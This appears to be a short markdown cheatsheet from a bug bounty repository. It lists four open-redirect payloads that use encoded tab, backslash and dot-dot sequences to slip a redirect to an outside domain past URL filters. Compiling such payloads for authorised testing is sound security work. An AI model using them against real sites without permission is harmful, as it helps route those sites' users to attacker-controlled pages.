bugbounty-cheatsheet/cheatsheets/open-redirect.md

17 lines
134 B
Markdown
Raw Normal View History

2017-07-14 13:54:44 +00:00
## Open Redirect
```
/%09/google.com
```
```
/%5cgoogle.com
```
```
//www.google.com/%2f%2e%2e
```
```
//www.google.com/%2e%2e
```